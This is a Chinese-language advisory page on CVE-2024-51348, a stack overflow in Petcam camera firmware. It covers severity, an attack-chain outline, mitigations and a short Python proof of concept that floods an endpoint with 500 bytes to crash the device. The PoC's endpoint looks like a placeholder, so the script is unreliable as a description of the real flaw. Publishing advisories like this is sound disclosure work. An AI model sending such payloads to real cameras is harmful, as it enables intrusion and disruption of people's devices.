CVE-2024-51348 CVSS 8.8 高危

CVE-2024-51348 BS Producten Petcam栈溢出漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2024-51348

漏洞类型

栈溢出

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

BS Producten Petcam

漏洞概述

BS Producten Petcam摄像头固件33.1.0.0818版本中的P2P API服务存在严重的栈缓冲区溢出漏洞。由于未对输入数据进行严格的边界检查，攻击者无需身份认证，仅需处于网络范围内，即可通过发送特制的HTTP请求触发该漏洞。成功利用此漏洞可覆盖指令指针，导致设备崩溃或执行任意代码，从而完全控制受影响设备。

技术细节

该漏洞的根源在于BS Producten Petcam固件中的P2P API服务对HTTP请求数据的处理逻辑存在缺陷。具体来说，服务在接收特定HTTP请求参数时，未正确验证数据的长度，直接将其复制到栈上的固定大小缓冲区中。由于栈空间有限，超长的数据会覆盖相邻的内存区域，包括返回地址或函数指针。攻击者可以通过精心构造的HTTP请求载荷，将恶意的Shellcode地址覆盖到指令指针位置。当函数返回或跳转时，CPU将执行攻击者控制的代码。由于攻击向量为邻接网（AV:A）且无需用户交互，一旦攻击者接入同一网络，即可利用此漏洞实现远程代码执行（RCE），获取设备的最高权限。

攻击链分析

STEP 1

侦察

攻击者扫描局域网，寻找BS Producten Petcam设备及其开放的P2P API服务端口。

STEP 2

武器化

攻击者构造包含特定长度填充数据和恶意返回地址的HTTP请求载荷。

STEP 3

投递

攻击者向目标设备的P2P API服务端口发送特制的HTTP请求。

STEP 4

利用

设备处理请求时触发栈溢出，覆盖指令指针，控制程序执行流。

STEP 5

执行

设备跳转执行恶意代码，攻击者获得远程代码执行权限，完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Target configuration
TARGET_IP = "192.168.1.100"
TARGET_PORT = 80
PAYLOAD = b"A" * 500  # Buffer overflow trigger payload

# Construct malicious HTTP request
# Exploiting the P2P API endpoint vulnerability
request = b"POST /p2p_api_endpoint HTTP/1.1\r\n"
request += b"Host: " + TARGET_IP.encode() + b"\r\n"
request += b"Content-Type: application/x-www-form-urlencoded\r\n"
request += b"Content-Length: " + str(len(PAYLOAD)).encode() + b"\r\n\r\n"
request += PAYLOAD

try:
    # Send payload to trigger stack overflow
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET_IP, TARGET_PORT))
    s.send(request)
    print("Payload sent successfully.")
    s.close()
except Exception as e:
    print(f"Error: {e}")

影响范围

BS Producten Petcam firmware 33.1.0.0818

防御指南

临时缓解措施

若无法立即更新固件，建议在防火墙层面阻断非受信任IP对设备P2P服务端口的访问，或暂时禁用设备的P2P远程访问功能。同时，应修改设备默认密码并加强网络监控，检测异常的HTTP流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表